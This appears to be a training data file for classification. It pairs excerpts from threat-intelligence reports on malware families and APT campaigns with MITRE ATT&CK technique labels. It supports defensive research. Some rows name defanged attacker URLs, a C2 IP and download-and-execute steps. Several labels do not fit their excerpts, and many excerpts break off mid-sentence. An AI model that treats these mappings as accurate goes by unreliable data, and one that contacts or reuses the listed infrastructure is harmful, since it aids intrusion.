456In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. It also does not use FTP for exfiltration['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
457Once you have set up the database and logged into the BloodHound web application, you need to pull AD data from your environment using the BloodHound PowerShell ingestor. Figure 1 shows a sample command that searches all domains in the forest (-SearchForest) and the folder location used to save the resulting CSV files['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
458If the DoublePulsar backdoor does not exist, then the SMB worm attempts to compromise the target using the Eternalblue SMBv1 exploit. After the first thread determines the local network subnet, the SMB worm scans local addresses beginning at the start of the netblock and increasing by one to the end of the netblock['T1016 - System Network Configuration Discovery']fine_tune
459This Unix binary is widely used by many malware families to determine the device’s unique ID (for campaign tracking), usually in the form of the machine’s serial number. This may or may not be hashed with another utility (e.g. md5) before being sent to the C2. To facilitate anti-analysis and evasion, ioreg is also used by some threat actors to determine whether the device is running in a virtual environment['T1497.001 - Virtualization/Sandbox Evasion: System Checks']fine_tune
460It uses a GetCurrentProcessID to find the process ID of the current process. It compares the UniqueProcessID member of the SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX structure with the current process ID['T1057 - Process Discovery']fine_tune
461Encryption is definitely the simplest method to hide the C&C server. We have encountered cases where the port has been stored in the data section, in the Delphi form data, or randomly chosen from a range['T1102.001 - Dead Drop Resolver']fine_tune
462The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script['T1204.002 - User Execution: Malicious File']fine_tune
4631) The malicious macro scans the victim’s Outlook inbox and looks for the strings “$$cpte” and “$$ecpte”. 2) Then the macro will open a CMD shell that will execute whatever instruction / command is in between the strings. 4) The macro searches for the special strings in the “Deleted Items” folder to find the attacker’s email address and sends the data back to the attackers via email. 5) Lastly, the macro will delete any evidence of the emails received or sent by the attackers['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
464A recent lull in the distribution of spam spreading information-stealing malware via the Hancitor downloader has been snapped['T1566.002 - Phishing: Spearphishing Link']fine_tune
465There are three types of URLs present in the decrypted configuration. The first type of URL listed in the configuration data is used for the plain HTTP (that is, non-Tor) communication with C&C servers. The bot reports to the C&C server using the typical request pattern: for example, the initial checkin to the C&C server is in the form of: cfg_url + “/images/” + encoded_data + (.jpeg||.gif||.bmp['T1132 - Data Encoding']fine_tune
466Similar to many other ransomware operators, CARBON SPIDER not only encrypted victim files using Darkside, but also exfiltrated data for publication on a dedicated leak site (DLS) hosted on Tor. For exfiltration, CARBON SPIDER primarily leveraged the MEGASync client for hosting provider MEGA but also employed GoToAssist['T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage']fine_tune
467They stop the Volume Shadow Copy service; the ransomware itself includes a command to delete existing shadow copies['T1490 - Inhibit System Recovery']fine_tune
468Emotet artifacts are typically found in arbitrary paths located off of the AppData\Local and AppData\Roaming directories. Persistence is typically maintained through Scheduled Tasks or via registry keys. Additionally, Emotet creates randomly-named files in the system root directories that are run as Windows services['T1053.005 - Scheduled Task/Job: Scheduled Task']fine_tune
469The backdoor also creates a separate thread that installs a Windows hook procedure on message WH_KEYBOARD_LL, through which it can intercept keystrokes. We believe this is mainly used to intercept credentials from other browsers, specifically Google Chrome['T1056.001 - Input Capture: Keylogging']fine_tune
470Kimsuky is a highly motivated APT that has traditionally targeted entities in South Korea. The APT group has used a variety of malware such as Gold Dragon, Babyshark and Appleseed to target entities ranging from defense to education and think tanks. Some file enumerators will exfiltrate all files with specific extensions. What's interesting here, however, is that the attackers knew exactly which files they were looking for['T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage']fine_tune
471The Trojan obfuscates its executable code prior to compilation, rather than packing it like most other ransomware, making it harder for researchers to reverse engineer and analyze the malicious code. It also obscures the links to the necessary API function, and stores hashes to strings rather than the actual strings. Upon installation, the Trojan reviews the directory its executable is started from, and if it spots an attempt to launch it from an ‘incorrect’ directory – such as a potential automated sandbox – it exits. Before encrypting files on a victim device, SynAck checks the hashes of all running processes and services against its own hard coded list. If it finds a match, it tries to kill the process['T1083 - File and Directory Discovery', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks']fine_tune
472Before being sent to the server, the data structure has to pass through shaping as shown in Fig['T1560 - Archive Collected Data']fine_tune
473When the backdoor is configured to use HTTPS to communicate with the C2, the functionality is largely the same as when in HTTP mode. The differences are that it lacks the options to update a session key due to encryption being handled by the TLS layer and it also does not have the option to send data to and from the C2 in the chunking mode previously described. In addition, only one transmission is made to the C2 when the malware is establishing a connection as there is no exchange of an AES session key. The hello message that is sent contains the same plaintext data as the HTTP mode['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
474For persistence and remote control, the script downloads another base64-encoded Python script from hxxps://ptpb[.]pw/OAZG. After several steps of de-obfuscation, we found the attackers using EmPyre for post-exploitation control['T1027 - Obfuscated Files or Information']fine_tune
475The Magic Hound campaign used Word and Excel documents containing malicious macros as a delivery method, specifically attempting to load either the Pupy RAT or meterpreter which we have called MagicHound.Rollover. The malicious macros were all designed to use Windows PowerShell to download a shellcode-based payload from a remote server. We discovered two different techniques used in the PowerShell scripts, the first being a straightforward execute command of a string retrieved from the remote server. The second technique appeared to be from a tool called Magic Unicorn, an open source module for meterpreter. Specifically, we discovered code in the PowerShell script that was a match for code in Magic Unicorn containing the comment “one line shellcode injection with native x86 shellcode['T1105 - Ingress Tool Transfer']fine_tune
476Throughout the year, Volexity identified multiple Vietnamese-language news websites that appeared to be compromised, as they were being used to load an OceanLotus web profiling framework. The exact functionality varied from site to site, but the goal of these frameworks was to gather information about site visitors and, in some cases, deliver malware. This code appears to be a variation of what Volexity has previously described as Framework A['T1583.001 - Domains']fine_tune
477For example, here is a folder and a list of files created by picking the C:\Windows\system32\TCPSVCS.exe executable as a source of data['T1543.003 - Create or Modify System Process: Windows Service']fine_tune
478The attackers used both families concurrently from late last year through November 2017 and there is some C2 infrastructure overlap between the two families, as well as links to historical reporting. Reaver Malware Analysis To date, Palo Alto Networks Unit 42 has identified 10 unique samples and three distinct variants of a new malware family we have named “Reaver”. As such, we identify each variant as Reaver.v1, Reaver.v2, and Reaver.v3. Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 use a payload that uses raw TCP connections for this communication. The flow for Reaver is as shown['T1071.001 - Application Layer Protocol: Web Protocols', 'T1095 - Non-Application Layer Protocol']fine_tune
479Another payload of the Ecipekac loader, which we call SodaMaster (a.k.a. DelfsCake), is also a new fileless malware. In our research we found more than 10 samples of SodaMaster. The only differences were in the configuration data, including a hardcoded C2, an encoded RSA key and additional data for calculating a mutex value['T1105 - Ingress Tool Transfer', 'T1573.002 - Asymmetric Cryptography']fine_tune
480When executed, the DLL drops and launches using a WinExec API call. This stage of the Valak malware uses a malicious JavaScript file with a random name that changes per execution['T1218.010 - Signed Binary Proxy Execution: Regsvr32']fine_tune
481The script modifies Windows Defender settings to exclude the target logical drive it is going to wipe from scheduled and real-time scanning['T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
482MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. Upon successful intrusion, they have used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts. NICKEL actors created and deployed custom malware that allowed them to maintain persistence on victim networks over extended periods of time. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks['T1016 - System Network Configuration Discovery', 'T1119 - Automated Collection', 'T1587.001 - Malware', 'T1078 - Valid Accounts']fine_tune
483To load the driver, a new service is created using the API CreateServiceW. The name and display name for this service is the 4-character name used for the file name. Next, StartServiceW is called in a loop five times to ensure the driver is loaded. Immediately after the driver is loaded, the service is removed by deleting the entire registry key['T1106 - Native API', 'T1543.003 - Create or Modify System Process: Windows Service']fine_tune
484Once the attackers identify the files of interest, the module is instrumented for exfiltration of the files. The VBScript-based file recon module used by the attackers is somewhat different. The URL constructed had the following format: http://<attacker_controlled_domain>/report.php['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
485Between 2016 and 2020, we have seen ScreenConnect and Onehub used in malicious cyber activity by different, unassociated threat actors. For example, between 2016 and 2019 unknown threat actors targeted IT outsourcing firms, including compromising US-based Cognizant and India-based Wipro. [7] The actors responsible for these attacks used ScreenConnect to connect to endpoints on client networks, enabling them to conduct further lateral movements and automated actions on objectives. During an incident impacting Cognizant and their client Maritz Holdings, actors used ScreenConnect to propagate to other connected systems and caused over $1.8 million (USD) in losses through a gift card fraud scheme. [6] In 2019, another threat group used ConnectWise to execute PowerShell commands in their target environments. [7] In 2020, ScreenConnect/ConnectWise has been utilized by the cybercriminal group Pinchy Spider (GOLD SOUTHFIELD, GOLD GARDEN, Sodinokibi, REvil, GandCrab) to distribute Sodinokibi ransomware['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
486Stage 1: A Master Boot Record (MBR) locker used to overwrite the operating system's MBR, which effectively prevents the operating system from loading successfully - Stage 2: A disk-wiper used to wipe and destroy files on the target machine['T1561.002 - Disk Structure Wipe']fine_tune
487The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques['T1105 - Ingress Tool Transfer']fine_tune
488BADNEWS Much of BADNEWS has remained consistent from when it was originally discussed by Forcepoint in August 2016. To briefly recap, the BADNEWS malware family acts as a backdoor, with communication occurring over HTTP. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop. This tactic uses public web services to host content that contains encoded commands that are decoded by the malware['T1113 - Screen Capture']fine_tune
489As we can see, it simply downloads a file from secure.dropinbox[.]pw using HTTP on port 443 (not HTTPS), and proceeds to decrypt the file using AES-128 prior to executing it. At this point, Cardinal RAT has been downloaded and executed, and execution is directed to this sample. Of course, the Carp Downloader is not required to download Cardinal RAT, however, based on our visibility, it has exclusively done so['T1105 - Ingress Tool Transfer', 'T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
490Many fields of the installer are forged to match those of the Acrobat Reader installer, and the interface shown after execution is also styled after Acrobat Reader['T1036.005 - Masquerading: Match Legitimate Name or Location']fine_tune
491The use of the legitimate regsvr32.exe application to run a .sct file is an AppLocker bypass technique originally discovered by Casey Smith (@subtee), which eventually resulted in a Metasploit module. The WINDOWSTEMP.ps1 script is a dropper that decodes an embedded executable using base64 and decompresses it with the System.IO.Compression.GzipStream object. The WindowsTemplate.exe executable is a new variant of RogueRobin written in C['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1218.010 - Signed Binary Proxy Execution: Regsvr32', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1140 - Deobfuscate/Decode Files or Information', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification']fine_tune
492Juniper Threat Labs has been monitoring a campaign that pushes a new IcedID banking trojan. This new campaign changes tactics by injecting into msiexec.exe to conceal itself and uses full steganography for downloading its modules and configurations. Previous versions of IcedID injected into svchost.exe and downloaded encrypted modules and config as “.dat” files. IcedID is a banking malware that performs Man-in-the-Browser attacks to steal financial information['T1105 - Ingress Tool Transfer']fine_tune
493Execution through API (a batch file, for example). Application process discovery, matching processes both by hashes of their names and directly by name. File and directory discovery: to search for files to encrypt. Encrypt files. Create files['T1486 - Data Encrypted for Impact']fine_tune
494The malware uses at least three separate encryption methods for its traffic, depending on the type of message. The first method, implemented within HTTPDLL.dll, is used for the decryption of values and traffic relating to the HTTP GET requests (i) and (ii) discussed above. It appears to use an implementation of AES to encrypt the data which is then transmitted in its encrypted format. The key (shown in the image below) is apparently static, at least among the samples tested, and generated by drawing byte values from multiple parts of the binary and performing a number of bitwise operations on them['T1132.001 - Data Encoding: Standard Encoding', 'T1573.001 - Symmetric Cryptography']fine_tune
4951) The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign. 2) The script uses the function radador(), which returns a randomized integer. This function is able to obfuscate code so that every iteration of the code is presented differently. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign['T1027 - Obfuscated Files or Information']fine_tune
496Implant Type – WaterBear is a stage-2 implant with many capabilities; BendyBear is a stage-0 downloader['T1105 - Ingress Tool Transfer']fine_tune
497Monday, February 12, 2018. Olympic Destroyer Takes Aim At Winter Olympics. This blog post is authored by Warren Mercer and Paul Rascagneres. Olympic Destroyer Workflow. Initial stage. The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. SQLite is embedded in the sample. System Credential Stealer. In addition to the browser credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: "Disabled: Specifies that the service should not be started." Legitimate File. Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Using legitimate tools like PsExec will save the adversary time from writing their own tooling. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony. Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors['T1021.002 - Remote Services: SMB/Windows Admin Shares']fine_tune
498SOMBRAT evades forensic analysis by patching the process memory used to record command line arguments. It replaces the initial command line with the base filename of the program executable, removing any arguments. This means that investigators that inspect a process listing via memory forensics will see the innocuous-looking command line `powershell.exe` rather than references to the uncommon filename such as `WwanSvc.c['T1057 - Process Discovery', 'T1564.010 - Process Argument Spoofing']fine_tune
499POWRUNER may also receive batch commands from the C2 server to collect host information from the system['T1083 - File and Directory Discovery', 'T1057 - Process Discovery', 'T1047 - Windows Management Instrumentation', 'T1049 - System Network Connections Discovery', 'T1016 - System Network Configuration Discovery', 'T1082 - System Information Discovery', 'T1033 - System Owner/User Discovery']fine_tune
500The 0x1 bit in the control flags is used in this module to specify if the download should be done via HTTPS['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
501TeamTNT targets exposed Docker API to deploy malicious images. Docker images containing TeamTNT malware are being hosted in public Docker repos via account takeovers. TeamTNT leverages exposed Docker hub secrets within GitHub to stage malicious Docker images. The following MITRE ATT&CK techniques were observed: Deploy Container (T1610), User Execution: Malicious Image (T1204.003), Unsecured Credentials: Credentials In Files (T1552.002), Implant Internal Image (T1525), and Valid Accounts: Cloud Accounts (T1078.004['T1204.003 - User Execution: Malicious Image']fine_tune
502Crutch is able to bypass some security layers by abusing legitimate infrastructure – here Dropbox – in order to blend into normal network traffic while exfiltrating stolen documents and receiving commands from its operators['T1102.002 - Bidirectional Communication']fine_tune
503Some of the executables pack the collected data into a password protected archive and save it to the disk, while others send the data to the C&C server directly['T1074.001 - Data Staged: Local Data Staging', 'T1560 - Archive Collected Data']fine_tune
504Woburn, MA – May 7, 2018 – Kaspersky Lab researchers have discovered a new variant of the SynAck ransomware Trojan using the Doppelgänging technique to bypass anti-virus security by hiding in legitimate processes. The developers behind SynAck also implement other tricks to evade detection and analysis, obfuscating all malware code prior to sample compilation and exiting if signs suggest it is being launched in a sandbox['T1027 - Obfuscated Files or Information']fine_tune
505Monday, February 12, 2018. Olympic Destroyer Takes Aim At Winter Olympics. This blog post is authored by Warren Mercer and Paul Rascagneres. The Guardian, a UK newspaper, reported an article that suggested the Olympic computer systems suffered technical issues during the opening ceremony. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. Olympic Destroyer Workflow. Initial stage. The initial edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9 sample is a binary that, when executed, drops multiple files on to the victim host. Dropped Files. Browser Credential Stealer. Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample. System Credential Stealer. In addition to the browser credential stealer, Olympic Destroyer drops and executes a system stealer. The stealer attempts to obtain credentials from LSASS with a technique similar to that used by Mimikatz. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: "Disabled: Specifies that the service should not be started." Legitimate File. Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. Disruption is the clear objective in this type of attack and it leaves us confident in thinking that the actors behind this were after embarrassment of the Olympic committee during the opening ceremony['T1070.001 - Indicator Removal on Host: Clear Windows Event Logs']fine_tune
506The dropper then decrypts the ciphertext by using an XOR cipher and a specific base64-encoded string that is decoded and used as the key. Before accessing the ciphertext, the dropper subtracts 14 from the specified offset, which is the same as previous Disttrack samples delivered in Shamoon 2 attacks. Tables 1, 2, and 3 include the resources, the information used to extract them, and the resulting module['T1078.002 - Domain Accounts']fine_tune
507We see it clustered here with some dynamic domain name system (DNS) domains. Dynamic DNS domains were observed in this cluster on later IP addresses as well, though this technique appears to have fallen out of favor, at least in this context, since there are none in this cluster currently active['T1568 - Dynamic Resolution']fine_tune
508When downloading and executing a tool, Flagpro first stores the downloaded file in the file path “%Temp%\~MY[0-9A-F].tmp”. Then, Flagpro adds the extension “.exe” to the name of the stored file and executes the file['T1036 - Masquerading']fine_tune
509Because TA505 is such a significant part of the email threat landscape, this blog provides a retrospective on the shifting malware, payloads, and campaigns associated with this actor. We examine their use of malware such as Jaff, Bart, and Rockloader that appear to be exclusive to this group as well as more widely distributed malware like Dridex and Pony. Where possible, we detail the affiliate models with which they are involved and outline the current state of TA505 campaigns['T1486 - Data Encrypted for Impact']fine_tune
510In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response. As the response is a random number that ends with ‘0’, POWRUNER sends another random GET request to receive an additional command string. The C2 server sends back a Base64-encoded response['T1132.001 - Data Encoding: Standard Encoding']fine_tune
511Using valid credentials, CARBON SPIDER moves laterally through victim environments using RDP and occasionally SSH. The adversary typically uses PS to run Cobalt Strike but occasionally writes Cobalt Strike stagers or KillACK backdoors to disk. Occasionally, CARBON SPIDER has deployed the legitimate GoToAssist or TightVNC tools to provide redundant control of hosts['T1021.005 - Remote Services:VNC', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1021.004 - Remote Services: SSH']fine_tune
512The test plugin attempts to connect to a provided address to check access to the network. Meanwhile, the reverse P2P plugin creates a proxy server to bridge the C&C and the client. This creates another connection to another C&C specified in the commands to act as a proxy, redirecting traffic from the infected machine to the real C&C server['T1090.002 - External Proxy']fine_tune
513This adversary group is most commonly associated with a custom PowerShell implant identified as Helminth. The Helminth implant is routinely delivered through macro-enabled Microsoft Office documents requiring user interaction to execute an obfuscated Visual Basic Script['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
514In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated['T1105 - Ingress Tool Transfer']fine_tune
515The notes also contain a threat to leak private information that has been collected from the target if the ransom is not paid['T1484.001 - Domain Policy Modification: Group Policy Modification', 'T1078.002 - Domain Accounts']fine_tune
516AT&T Alien Labs™ has discovered a new campaign by threat group TeamTNT that is targeting multiple operating systems and applications. The campaign uses multiple shell/batch scripts, new open source tools, a cryptocurrency miner, the TeamTNT IRC bot, and more['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
517To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor. The tools are downloaded and deployed to the original install directory previously created by the malware['T1588.002 - Tool']fine_tune
518It seems that the implementation for dynamic import resolution slightly varies in comparison to the one used in Azazel rootkit['T1014 - Rootkit']fine_tune
519Throughout our StellarParticle investigations, CrowdStrike identified what appeared to be a VBScript-based Active Directory enumeration toolkit. While the script’s contents have not been recovered to date, CrowdStrike has observed identical artifacts across multiple StellarParticle engagements that suggest the same or similar tool was used['T1057 - Process Discovery']fine_tune
520If it is executed with the "help" parameter, it will install a service to execute itself as a service. This parameter is used by the trojanized installer. This has a notable side effect: if rmaserv.exe is executed in isolation in a sandbox (so without the parameter), the service is not created. Consequently, the execution won't do anything and the dynamic analysis will be skewed. The second main feature is the service. This service has two features. First, it will launch the winprint32.exe executable (C2 contact module) and then it will wait for an event. This event is the mechanism used by the C2 contact module to alert the service executable to perform the cleaning of all components['T1569.002 - System Services: Service Execution']fine_tune
521Network Reconnaissance – gathering information from machines on the network. Credential Theft – stealing user names and passwords, potentially to provide them with further access to the victim network. RAR archiving – files are transferred to staging servers before exfiltration. Csvde – can be used to extract Active Directory files and data. WMIExec – can be used for lateral movement and to execute commands remotely. PowerShell - a powerful interactive command-line interface and scripting environment included in the Windows operating system['T1074.002 - Remote Data Staging']fine_tune
522On balance, the fall campaigns diverged from Bulgarian themed NetWire campaigns in the early summer in scope and scale. These campaigns distributed NetWire variants which used Bulgarian email lures, leveraged geofencing, and downloading EXEs through certutils. The NetWire malware has been around since at least 2002 and has been consistently in use by various actors across the threat landscape. This analysis shows groupings of similar campaigns distributing NetWire based on message attributes, email lures and language, Office document metadata, VBA Macro code, and malware configuration['T1566.001 - Phishing: Spearphishing Attachment', 'T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
523This thread searches for files with the following extensions on removable drives and copies them to ‘c:\system’ every 5 seconds['T1005 - Data from Local System', 'T1083 - File and Directory Discovery', 'T1074.001 - Data Staged: Local Data Staging', 'T1119 - Automated Collection', 'T1025 - Data from Removable Media']fine_tune
524Observed Clop samples try to kill several processes and services related to backups and security solutions. Clop also leverages Code Signing to evade detection. We observed the use of two signers during our research, as shown below in Figure 1['T1553.002 - Code Signing']fine_tune
525The FTP account information used in the malware can expose the C&C server to attacks. The string ‘victory’ used in the password has also been found in the b374k webshell used by the Kimsuky group['T1598.003 - Spearphishing Link', 'T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1027 - Obfuscated Files or Information']fine_tune
526The January 2022 version of PlugX malware utilizes RC4 encryption along with a hardcoded key that is built dynamically. For communications, the data is compressed then encrypted before sending to the command and control (C2) server and the same process in reverse is implemented for data received from the C2 server. e@T#L$PH%" as it is being passed along with the encrypted data. During the January 2022 campaigns, the delivered PlugX malware samples communicated with the C2 server 92.118.188[.]78 over port 187. In the February 2022 campaign, Proofpoint researchers observed a variation in which PlugX malware used an RC4 key that was sent to the bot in the first HTTP response which was then used to encrypt data going to the C2 server['T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
527Stage 2 is also a .NET DLL file that downloads a third file from parinari[.]xyz, converts it from ASCII to binary, and then creates a scheduled task to load it['T1053.005 - Scheduled Task/Job: Scheduled Task']fine_tune
528The plugin is designed to migrate the loader to the address space of another process. Injection parameters are set in the Lizar client configuration file. It should be noted that this plugin can be used not only to inject the loader, but also to execute other PE files in the address space of the specified process['T1055 - Process Injection', 'T1055.002 - Process Injection: Portable Executable Injection']fine_tune
529This release adds features to spawn processes with an alternate parent process. This release also gives the operator control over the script templates Cobalt Strike uses in its attacks and workflows. This release of Cobalt Strike pushes back on this technique with the ppid command. For example, if I’m in a user context, I might set explorer.exe as my parent with something plausible (e.g., iexplore.exe) for my temporary processes. If I’m in a SYSTEM context, I might use services.exe as my parent process and ask Beacon to use svchost.exe for its temporary processes. Beacon’s runu command runs an arbitrary command as a child of another parent. These commands offer means to spawn a payload, in another desktop session, without remote process injection. The Resource Kit. Cobalt Strike 3.8’s Resource Kit finally gives you a way to change Cobalt Strike’s built-in script templates. The Resource Kit is a collection of Cobalt Strike’s default script templates and a sample Aggressor Script to bring these into Cobalt Strike. The Resource Kit benefits from new Aggressor Script hooks to provide the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows['T1078.003 - Valid Accounts: Local Accounts']fine_tune
5302) Shell scripts used to launch the QEMU images. 3) Daemons used to start the shell scripts at boot and keep them running. 4) A CPU monitor shell script with an accompanying daemon that can start/stop the mining based on CPU usage and whether the Activity Monitor process is running['T1057 - Process Discovery']fine_tune
531It does so by monitoring the content of the clipboard and if the data seem to be a cryptocurrency wallet, it replaces them with the attacker’s own. This technique is not new; it has been used by other malware in the past – even the infamous BackSwap banking trojan implemented it in its earliest stages['T1565.002 - Transmitted Data Manipulation']fine_tune
532The data exchanged between the module and the C&C is encrypted with a proprietary algorithm and then encoded as readable Latin characters['T1132.002 - Non-Standard Encoding']fine_tune
533In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
534It eventually downloads a PowerShell module from an Amazon S3 bucket URL hxxps://s3[.]amazonaws[.]com/doclibrarysales/test[.]txt and then executes it['T1583.006 - Web Services', 'T1102 - Web Service']fine_tune
535The script variant of the Helminth Trojan consists of a VBScript and PowerShell script named update.vbs and dns.ps1. We aptly named this variant the script version, as we found another version of this Trojan that we will discuss later in this Appendix['T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
536C2 commands are represented as seemingly random alphanumerical ASCII strings (e.g. These dynamic updates to Goldmax configuration data enable the ability to set a new activation date, replace the existing C2 URL and User-Agent values, enable/disable the decoy network traffic feature, and update the number range used by its PRNG['T1059.003 - Command and Scripting Interpreter: Windows Command Shell']fine_tune
537In order to meet the phishing emails’ infrastructure requirements, disposable domains and emails were used as the delivery medium. On occasion, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself['T1566.002 - Phishing: Spearphishing Link']fine_tune
538Once installed, JSSLoader provides the threat group with a backdoor to the victim’s computer and the organization['T1204.002 - User Execution: Malicious File', 'T1047 - Windows Management Instrumentation']fine_tune
539To do so, this malware attempts to spread to other systems on network using what are likely stolen administrator credentials. This is again similar to the 2012 Shamoon attacks, where compromised but legitimate credentials obtained in advance of the attacks were also hard coded into the malware to aid in its propagation. Disttrack also has the ability to download and execute additional applications to the system, as well as remotely set the date to start wiping systems['T1569.002 - System Services: Service Execution']fine_tune
540This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them, depending on a set of rules defined by the attackers. The stolen data is copied into a hidden directory as “%MYPICTURES%\%volume serial number%”, from where it can be exfiltrated by the attackers using one of the AZZY implants['T1074.001 - Data Staged: Local Data Staging', 'T1025 - Data from Removable Media']fine_tune
541The implant consists of a modified Cisco IOS image that allows the attacker to load different functional modules from the anonymity of the internet. Each of the modules is enabled via the HTTP protocol (not HTTPS), using specifically crafted TCP packets sent to the router's interface. The packets have a nonstandard sequence and corresponding acknowledgment numbers. The modules can manifest themselves as independent executable code or hooks within the router's IOS that provide functionality similar to the backdoor password['T1205 - Traffic Signaling']fine_tune
542Spearphishing Attachment (ATT&CK T1193) is one of the most used Initial Access techniques used by ransomware families such as Sodinokibi. Attackers use spam emails with an attached MS Office Word document including a malicious macro to download the ransomware to the target system. In order to show the lifecycle of Sodinokibi ransomware, we analyzed a Microsoft Word document. Sodinokibi is a “Ransomware-as-a-Service” (RAAS) malware, so its distribution methods vary depending on the attacker distributing it['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
543Collects information about the infected system, network, drives, and installed applications. Saves the collected information to a file named “info” in “%appdata%\Micorosoft\Templates” and sends it to the C2['T1082 - System Information Discovery']fine_tune
544As can be seen from Table 2 above, Kazuar has an extensive command set, many of which are similar in functionality to other backdoor Trojans. However, a few commands specific to Kazuar appear to be unique and are worth further discussion['T1029 - Scheduled Transfer']fine_tune
545Adversaries aiming to exfiltrate large amounts of data will often use one or more systems or storage locations for intermittent storage of the collected data. This process is called staging and is one of the activities that NCC Group and Fox-IT have observed in the analysed C2 traffic['T1560.001 - Archive Collected Data: Archive via Utility', 'T1074.001 - Data Staged: Local Data Staging', 'T1074.002 - Remote Data Staging']fine_tune
546The employee receiving this email downloaded and opened the document, which contained malicious code. Once the code was executed, a persistence mechanism was installed and a malicious password harvester was executed. In this instance, once the malicious code was executed, it dropped a malicious binary (DLL) similar to CobaltStrike, which subsequently created and executed additional files. The actor used the initially compromised system to escalate privileges and move laterally across additional systems on the network['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
547FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059 - Command and Scripting Interpreter', 'T1218.011 - Signed Binary Proxy Execution: Rundll32']fine_tune
548Lucifer is quite powerful in its capabilities. Not only is it capable of dropping XMRig for cryptojacking Monero, it’s also capable of command and control (C2) operation and self-propagation through the exploitation of multiple vulnerabilities and credential brute-forcing. Additionally, it drops and runs EternalBlue, EternalRomance, and DoublePulsar backdoor against vulnerable targets for intranet infections['T1210 - Exploitation of Remote Services']fine_tune
549We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here['T1055.002 - Process Injection: Portable Executable Injection']fine_tune
